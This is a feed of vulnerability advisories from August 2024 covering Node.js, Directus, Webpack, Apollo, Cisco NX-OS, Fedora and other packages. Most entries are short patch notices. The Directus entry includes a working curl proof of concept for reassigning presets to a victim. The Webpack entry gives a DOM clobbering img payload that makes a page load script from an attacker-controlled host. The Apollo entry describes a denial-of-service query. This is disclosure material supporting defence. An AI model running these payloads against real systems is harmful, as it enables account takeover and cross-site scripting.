26.08.2024 03:00:00	redhat	[RHSA-2024:5815] nodejs:20 security update (moderate)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)* nodejs: fs.lstat bypasses permission model (CVE-2024-22018)* nodejs: fs.fchown/fchmod bypasses permission model (CVE-2024-36137)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5815
26.08.2024 03:00:00	redhat	[RHSA-2024:5814] nodejs:20 security update (moderate)	Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* node-tar: denial of service while parsing a tar file due to lack of folders depth validation (CVE-2024-28863)* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)* nodejs: fs.lstat bypasses permission model (CVE-2024-22018)* nodejs: fs.fchown/fchmod bypasses permission model (CVE-2024-36137)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5814
27.08.2024 22:54:31	npm	[NPM:GHSA-3FFF-GQW3-VJ86] Directus has an insecure object reference via PATH presets (moderate)	### ImpactDirectus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request. When chained with [CVE-2024-6533](https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw), it could result in account takeover.This vulnerability occurs because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request.### PoCTo exploit this vulnerability, we need to do the follow steps using a non-administrative, default role attacker account.1. Create a preset for a collection.Store the preset id, or use it if it already exists from `GET /presets`. The following example will use the direct_users preset.```bashTARGET_HOST="http://localhost:8055" ATTACKER_EMAIL="malicious@malicious.com" ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" \| jq -r ".data.id") # Store all user's id curl -s -k "${TARGET_HOST}/users" \ -b "${root_dir}/static/attacker_directus_session_token" \| jq -r ".data[] \| select(.id != \"${attacker_user_id}\")" > "${root_dir}/static/users.json"# Choose the victim user id from the previous requestvictim_user_id="4f079119-2478-48c4-bd3a-30fa80c5f265"users_preset_id=$(curl -s -k -X 'POST' "${TARGET_HOST}/presets" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"{{tittle}}\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}" \| jq -r '.data.id')```2. Modify the presets via `PATCH /presets/{id}`.With the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from `GET /users`. The following example modifies the title parameter.```bashcurl -i -s -k -X 'PATCH' "${TARGET_HOST}/presets/${users_preset_id}" \ -H 'Content-Type: application/json' \ -b "${root_dir}/static/attacker_directus_session_token" \ --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${victim_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"PoC Assign another users presets\",\"subtitle\":\"fakeemail@fake.com\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"```Notes:Each new preset to a specific collection will have an integer consecutive id independent of the user who created it.The user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.The app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.When the victim visits the views of the modified presets, it will be rendered with the new configuration applied.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3FFF-GQW3-VJ86
27.08.2024 22:53:22	npm	[NPM:GHSA-QJ85-69XF-2VXQ] AWS CDK RestApi not generating authorizationScope correctly in resultant CFN template (moderate)	### SummaryThe AWS Cloud Development Kit (CDK) is an open-source framework for defining cloud infrastructure using code. Customers use it to create their own applications which are converted to AWS CloudFormation templates during deployment to a customer’s AWS account. CDK contains pre-built components called "constructs" that are higher-level abstractions providing defaults and best practices. This approach enables developers to use familiar programming languages to define complex cloud infrastructure more efficiently than writing raw CloudFormation templates. We identified an issue in AWS Cloud Development Kit (CDK) which, under certain conditions, can result in granting authenticated Amazon Cognito users broader than intended access. Specifically, if a CDK application uses the "RestApi" construct with "CognitoUserPoolAuthorizer" as the authorizer and uses authorization scopes to limit access. This issue does not affect the availability of the specific API resources. ### ImpactAuthenticated Cognito users may gain unintended access to protected API resources or methods, leading to potential data disclosure, and modification issues. Impacted versions: >=2.142.0;<=2.148.0### PatchesThe patch is included in CDK version >=2.148.1.### Recommended Actions* Upgrade your AWS CDK version to 2.148.1 or newer and re-deploy your application(s) to address this issue.* If you are using older CDK versions before 2.142.0, you are not affected by this issue, however it is recommended to upgrade to the latest version to receive the latest features and fixes.* Confirm whether your application(s) is affected by searching for "CognitoUserPoolsAuthorizer" in your CDK application. If it is referenced inside the "RestApi" construct, and the "RestApi" resource or method utilize authorization scopes to limit access, and you deployed your applications using the impacted versions of CDK, your application is affected.### References* AWS CDK Documentation: https://docs.aws.amazon.com/cdk/v2/guide/home.html* AWS CDK RestApi Construct Documentation: https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk-[lib.aws](http://lib.aws/)_apigateway.RestApi.html* AWS CDK CognitoUserPoolsAuthorizer Documentation: https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk- [lib.aws](http://lib.aws/)_apigateway.CognitoUserPoolsAuthorizer.html * AWS CDK v2.148.1 Release Notes: https://github.com/aws/aws-cdk/releases/tag/v2.148.1If you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our vulnerability reporting page [1] or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.[1] Vulnerability reporting page: https://aws.amazon.com/security/vulnerability-reporting	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QJ85-69XF-2VXQ
27.08.2024 22:50:41	npm	[NPM:GHSA-4VVJ-4CPR-P986] Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS (moderate)	Hi, Webpack developer team!### SummaryWe discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.### Details#### BackgroundsDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:[1] https://scnps.co/papers/sp23_domclob.pdf[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/#### Gadgets found in WebpackWe identified a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. When the `output.publicPath` field in the configuration is not set or is set to `auto`, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:```/*****/ / webpack/runtime/publicPath //***/ (() => {/**/ var scriptUrl;/**/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";/**/ var document = __webpack_require__.g.document;/**/ if (!scriptUrl && document) {/**/ if (document.currentScript)/**/ scriptUrl = document.currentScript.src;/**/ if (!scriptUrl) {/**/ var scripts = document.getElementsByTagName("script");/**/ if(scripts.length) {/**/ var i = scripts.length - 1;/**/ while (i > -1 && (!scriptUrl \|\| !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;/**/ }/**/ }/**/ }/**/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration/**/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic./**/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");/***/ scriptUrl = scriptUrl.replace(/#.$/, "").replace(/\?.$/, "").replace(/\/[^\/]+$/, "/");/***/ __webpack_require__.p = scriptUrl;/**/ })();```However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with `document.currentScript` can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the `src` attribute of the attacker-controlled element will be used as the `scriptUrl` and assigned to `__webpack_require__.p`. If additional scripts are loaded from the server, `__webpack_require__.p` will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.### PoCPlease note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.Consider a website developer with the following two scripts, `entry.js` and `import1.js`, that are compiled using Webpack:```// entry.jsimport('./import1.js') .then(module => { module.hello(); }) .catch(err => { console.error('Failed to load module', err); });``````// import1.jsexport function hello () { console.log('Hello');}```The webpack.config.js is set up as follows:```const path = require('path');module.exports = { entry: './entry.js', // Ensure the correct path to your entry file output: { filename: 'webpack-gadgets.bundle.js', // Output bundle file path: path.resolve(__dirname, 'dist'), // Output directory publicPath: "auto", // Or leave this field not set }, target: 'web', mode: 'development',};```When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the `import1.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.```<!DOCTYPE html><html><head> <title>Webpack Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!></head><script src="./dist/webpack-gadgets.bundle.js"></script><body></body></html>```### ImpactThis vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.### PatchA possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174```/***/ / webpack/runtime/publicPath //***/ (() => {/**/ var scriptUrl;/**/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";/**/ var document = __webpack_require__.g.document;/**/ if (!scriptUrl && document) {/**/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>/**/ scriptUrl = document.currentScript.src;/**/ if (!scriptUrl) {/**/ var scripts = document.getElementsByTagName("script");/**/ if(scripts.length) {/**/ var i = scripts.length - 1;/**/ while (i > -1 && (!scriptUrl \|\| !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;/**/ }/**/ }/**/ }/**/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration/**/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic./**/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");/***/ scriptUrl = scriptUrl.replace(/#.$/, "").replace(/\?.$/, "").replace(/\/[^\/]+$/, "/");/***/ __webpack_require__.p = scriptUrl;/****/ })();```Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4VVJ-4CPR-P986
27.08.2024 21:14:13	npm	[NPM:GHSA-FMJ9-77Q8-G6C4] Apollo Query Planner and Apollo Gateway may infinitely loop on sufficiently complex queries (high)	### ImpactInstances of @apollo/query-planner >=2.0.0 and <2.8.5 are impacted by a denial-of-service vulnerability. @apollo/gateway versions >=2.0.0 and < 2.8.5 and Apollo Router <1.52.1 are also impacted through their use of @apollo/query-planner. If @apollo/query-planner is asked to plan a sufficiently complex query, it may loop infinitely and never complete. This results in unbounded memory consumption and either a crash or out-of-memory (OOM) termination.This issue can be triggered if you have at least one non-`@key` field that can be resolved by multiple subgraphs. To identify these shared fields, the schema for each subgraph must be reviewed. The mechanism to identify shared fields varies based on the version of Federation your subgraphs are using.You can check if your subgraphs are using Federation 1 or Federation 2 by reviewing their schemas. Federation 2 subgraph schemas will contain a `@link` directive referencing the version of Federation being used while Federation 1 subgraphs will not. For example, in a Federation 2 subgraph, you will find a line like `@link(url: "https://specs.apollo.dev/federation/v2.0")`. If a similar `@link` directive is not present in your subgraph schema, it is using Federation 1. Note that a supergraph can contain a mix of Federation 1 and Federation 2 subgraphs.To review Federation 1 subgraphs for impact:In Federation 1 subgraphs, fields are implicitly shareable across subgraphs. To review for impact, you will need to review for cases where multiple subgraphs can resolve the same field. For example: ```graphql# Subgraph 1type Query { field: Int}# Subgraph 2type Query { field: Int}```To review Federation 2 subgraphs for impact:In Federation 2 subgraphs, fields must be explicitly defined as shareable across subgraphs. This is done via the `@shareable` directive. For example:```graphql# Subgraph 1@link(url: "https://specs.apollo.dev/federation/v2.0")type Query { field: Int @shareable}# Subgraph 2@link(url: "https://specs.apollo.dev/federation/v2.0")type Query { field: Int @shareable}```### Impact DetailThis issue results from the Apollo query planner attempting to use a `Number` exceeding Javascript’s `Number.MAX_VALUE` in some cases. In Javascript, `Number.MAX_VALUE` is (2^1024 - 2^971).When the query planner receives an inbound graphql request, it breaks the query into pieces and for each piece, generates a list of potential execution steps to solve the piece. These candidates represent the steps that the query planner will take to satisfy the pieces of the larger query. As part of normal operations, the query planner requires and calculates the number of possible query plans for the total query. That is, it needs the product of the number of query plan candidates for each piece of the query. Under normal circumstances, after generating all query plan candidates and calculating the number of all permutations, the query planner moves on to stack rank candidates and prune less-than-optimal options. In particularly complex queries, especially those where fields can be solved through multiple subgraphs, this can cause the number of all query plan permutations to balloon. In worst-case scenarios, this can end up being a number larger than `Number.MAX_VALUE`. In Javascript, if `Number.MAX_VALUE` is exceeded, Javascript represents the value as “infinity”. If the count of candidates is evaluated as infinity, the component of the query planner responsible for pruning less-than-optimal query plans does not actually prune candidates, causing the query planner to evaluate many orders of magnitude more query plan candidates than necessary.A given graph’s exposure to this issue varies based on its complexity. Consider the following Federation 2 subgraphs: ```graphql# Subgraph 1type Query { field: Int @shareable}# Subgraph 2type Query { field: Int @shareable}```The query planner can solve requests for `Query.field` in one of two ways - either by querying subgraph 1 or subgraph 2. The following query with 1024 aliased fields would trigger this issue because 2^1024 > `Number.MAX_VALUE`: ```graphqlquery { field_1: field field_2: field # ... field_1023: field field_1024: field}```However, in a graph that provided 5 options to solve a given field, the bug could be encountered in a query that aliased the field approximately 440 times.### Patches@apollo/query-planner 2.8.5@apollo/gateway 2.8.5Apollo Router 1.52.1### WorkaroundsThis issue can be avoided by ensuring there are no fields resolvable from multiple subgraphs. If all subgraphs are using Federation 2, you can confirm that you are not impacted by ensuring that none of your subgraph schemas use the `@shareable` directive. If you are using Federation 1 subgraphs, you will need to validate that there are no fields resolvable by multiple subgraphs. Note that a supergraph can contain a mix of Federation 1 and Federation 2 subgraphs. If you do have fields resolvable by multiple subgraphs, changing this behavior in response to this issue may be risky to the operation of your supergraph. We recommend that you update to a patched version of either Apollo Router or Apollo Gateway.Apollo customers with an enterprise entitlement using the Apollo Router can also mitigate much of the risk from this issue by implementing [Apollo’s Persisted Queries (PQ) feature](https://www.apollographql.com/docs/router/configuration/persisted-queries). With PQ enabled, the Apollo Router will only execute safelisted queries. While customers would need to ensure that queries that induce this issue are not added to the safelist, PQs would mitigate the risk of clients submitting ad hoc queries that exploit this issue.### References[Additional information on Query Plans](https://www.apollographql.com/docs/federation/query-plans/)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FMJ9-77Q8-G6C4
27.08.2024 20:09:06	fedora	[FEDORA-2024-a455bea9ca] Fedora 40: calibre (critical)	Fix fonts for < f41 releases.Upgrade to latest upstream release to fix 4 CVE's and enable new hardware	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a455bea9ca
27.08.2024 20:08:59	fedora	[FEDORA-2024-f4eb809b49] Fedora 40: dotnet8.0 (medium)	This is the August 2024 monthly update for .NET 8. This includes a fix forCVE-2024-38167Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.108.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.8.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f4eb809b49
27.08.2024 20:08:55	fedora	[FEDORA-2024-1f1c0537d3] Fedora 40: webkit2gtk4.0 (critical)	Update to 2.44.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1f1c0537d3
27.08.2024 20:08:53	fedora	[FEDORA-2024-6b8845e3f0] Fedora 40: webkitgtk (critical)	Fix web process cache suspend/resume when sandbox is enabled.Fix accelerated images disappearing after scrolling.Fix video flickering with DMA-BUF sink.Fix pointer lock on X11.Fix movement delta on mouse events in GTK3.Undeprecate console message API and make it available in 2022 API.Fix several crashes and rendering issues.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6b8845e3f0
27.08.2024 22:52:15	npm	[NPM:GHSA-48X4-MX8F-GR4H] Flowise Unauthenticated Denial of Service (DoS) vulnerability (high)	An Unauthenticated Denial of Service (DoS) vulnerability exists in Flowise version 1.8.2 leading to a complete crash of the instance running a vulnerable version due to improper handling of user supplied input to the `/api/v1/get-upload-file` api endpoint.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-48X4-MX8F-GR4H
28.08.2024 00:47:13	npm	[NPM:GHSA-2Q4W-X8H2-2FVH] Flowise Authentication Bypass vulnerability (high)	An Authentication Bypass vulnerability exists in Flowise version 1.8.2. This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2Q4W-X8H2-2FVH
27.08.2024 05:00:48	fedora	[FEDORA-2024-8eff1bffb1] Fedora 39: dotnet8.0 (medium)	This is the August 2024 monthly update for .NET 8. This includes a fix forCVE-2024-38167Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.108.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.8/8.0.8.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8eff1bffb1
27.08.2024 03:00:00	cisa	[CISA-2024:0827] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0827
27.08.2024 03:00:00	debian	[DSA-5759-1] python3.11 (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5759-1
28.08.2024 19:00:00	cisco	[CISCO-SA-NXOS-PSBE-CE-YVBTN5DU] Cisco NX-OS Software Python Sandbox Escape Vulnerabilities (medium)	Multiple vulnerabilities in the Python interpreter of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to escape the Python sandbox and gain unauthorized access to the underlying operating system of the device.These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by manipulating specific functions within the Python interpreter. A successful exploit could allow an attacker to escape the Python sandbox and execute arbitrary commands on the underlying operating system with the privileges of the authenticated user.Note: An attacker must be authenticated with Python execution privileges to exploit these vulnerabilities. For more information regarding Python execution privileges, see product-specific documentation, such as the Cisco NX-OS Security with Python ["https://www.cisco.com/c/en/us/td/docs/dcn/nx-os/nexus9000/105x/programmability/cisco-nexus-9000-series-nx-os-programmability-guide-105x/m-n9k-python-api-101x.html?bookSearch=true#concept_A2CFF094ADCB414C983EA06AD8E9A410"] section of the Cisco Nexus 9000 Series NX-OS Programmability Guide.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-psbe-ce-YvbTn5du ["https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-psbe-ce-YvbTn5du"]This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-PSBE-CE-YVBTN5DU
28.08.2024 19:00:00	cisco	[CISCO-SA-NXOS-DHCP6-RELAY-DOS-ZNEAA6XN] Cisco NX-OS Software DHCPv6 Relay Agent Denial of Service Vulnerability (high)	A vulnerability in the DHCPv6 relay agent of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to improper handling of specific fields in a DHCPv6 RELAY-REPLY message. An attacker could exploit this vulnerability by sending a crafted DHCPv6 packet to any IPv6 address that is configured on an affected device. A successful exploit could allow the attacker to cause the dhcp_snoop process to crash and restart multiple times, causing the affected device to reload and resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-DHCP6-RELAY-DOS-ZNEAA6XN
28.08.2024 19:00:00	cisco	[CISCO-SA-NXOS-CMDINJ-LQ6JSZHH] Cisco NX-OS Software Command Injection Vulnerability (medium)	A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, low-privileged, local attacker to execute arbitrary commands on the underlying operating system of an affected device.This vulnerability is due to insufficient validation of arguments for a specific CLI command. An attacker could exploit this vulnerability by including crafted input as the argument of the affected command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the currently logged-in user.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-CMDINJ-LQ6JSZHH
28.08.2024 19:00:00	cisco	[CISCO-SA-NXOS-BSHACEPE-BAPEHSX7] Cisco NX-OS Software Bash Arbitrary Code Execution and Privilege Escalation Vulnerabilities (medium)	Multiple vulnerabilities in Cisco NX-OS Software could allow an authenticated, local attacker with privileges to access the Bash shell to execute arbitrary code with root privileges or elevate privileges to network-admin on an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the August 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75417"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-BSHACEPE-BAPEHSX7
28.08.2024 19:00:00	cisco	[CISCO-SA-CAPIC-PRIV-ESC-UYQJJNUU] Cisco Application Policy Infrastructure Controller Privilege Escalation Vulnerability (medium)	A vulnerability in the software upgrade component of Cisco Application Policy Infrastructure Controller (APIC) and Cisco Cloud Network Controller, formerly Cisco Cloud APIC, could allow an authenticated, remote attacker with Administrator-level privileges to install a modified software image, leading to arbitrary code injection on an affected system.This vulnerability is due to insufficient signature validation of software images. An attacker could exploit this vulnerability by installing a modified software image. A successful exploit could allow the attacker to execute arbitrary code on the affected system and elevate their privileges to root.Note: Administrators should always validate the hash of any upgrade image before uploading it to Cisco APIC and Cisco Cloud Network Controller.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CAPIC-PRIV-ESC-UYQJJNUU
28.08.2024 19:00:00	cisco	[CISCO-SA-APIC-COUSMO-UBPBYGBQ] Cisco Application Policy Infrastructure Controller Unauthorized Policy Actions Vulnerability (medium)	A vulnerability in the restricted security domain implementation of Cisco Application Policy Infrastructure Controller (APIC) could allow an authenticated, remote attacker to modify the behavior of default system policies, such as quality of service (QoS) policies, on an affected system.This vulnerability is due to improper access control when restricted security domains are used to implement multi-tenancy. An attacker with a valid user account associated with a restricted security domain could exploit this vulnerability. A successful exploit could allow the attacker to read, modify, or delete child policies created under default system policies, which are implicitly used by all tenants in the fabric, resulting in disruption of network traffic. Exploitation is not possible for policies under tenants that an attacker has no authorization to access.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APIC-COUSMO-UBPBYGBQ
28.08.2024 05:37:07	fedora	[FEDORA-2024-e23e8a3f1e] Fedora 40: dovecot	CVE-2024-23184: A large number of address headers in email resulted in excessiveCPU usage.CVE-2024-23185: Abnormally large email headers are now truncated or discarded,with a limit of 10MB on a single header and 50MB for all the headers of all theparts of an email.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e23e8a3f1e
28.08.2024 05:22:26	fedora	[FEDORA-2024-ba5bb9f63a] Fedora 39: dovecot	CVE-2024-23184: A large number of address headers in email resulted in excessiveCPU usage.CVE-2024-23185: Abnormally large email headers are now truncated or discarded,with a limit of 10MB on a single header and 50MB for all the headers of all theparts of an email.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ba5bb9f63a
28.08.2024 03:00:00	cisa	[CISA-2024:0828] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0828
28.08.2024 10:33:12	pypi	[PYSEC-2024-72] ekuiper vulnerability	LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-72
30.08.2024 02:15:10	alpinelinux	[ALPINE:CVE-2024-1545] wolfssl vulnerability (medium)	[From CVE-2024-1545] Fault Injection vulnerability in RsaPrivateDecryption function in wolfssl/wolfcrypt/src/rsa.c in WolfSSL wolfssl5.6.6 on Linux/Windows allows remote attacker co-resides in the same system with a victim process to disclose information and escalate privileges via Rowhammer fault injection to the RsaKey structure.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-1545
29.08.2024 04:35:04	fedora	[FEDORA-2024-254c31b144] Fedora 40: python3.6 (medium)	Security fix for CVE-2024-6923	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-254c31b144
29.08.2024 04:34:58	fedora	[FEDORA-2024-c0e7a4f5ef] Fedora 40: less (high)	Security fix for CVE-2024-32487 - less with LESSOPEN mishandles \n in paths	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c0e7a4f5ef
29.08.2024 04:31:10	fedora	[FEDORA-2024-a7af4e0ea2] Fedora 39: python3.6 (medium)	Security fix for CVE-2024-6923	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a7af4e0ea2
29.08.2024 16:46:13	almalinux	[ALSA-2024:6000] postgresql:12 security update (important)	postgresql:12 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6000
29.08.2024 16:39:16	almalinux	[ALSA-2024:6001] postgresql:15 security update (important)	postgresql:15 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6001
29.08.2024 16:41:13	almalinux	[ALSA-2024:6018] postgresql:13 security update (important)	postgresql:13 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6018
29.08.2024 16:54:02	almalinux	[ALSA-2024:5999] postgresql security update (important)	postgresql security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5999
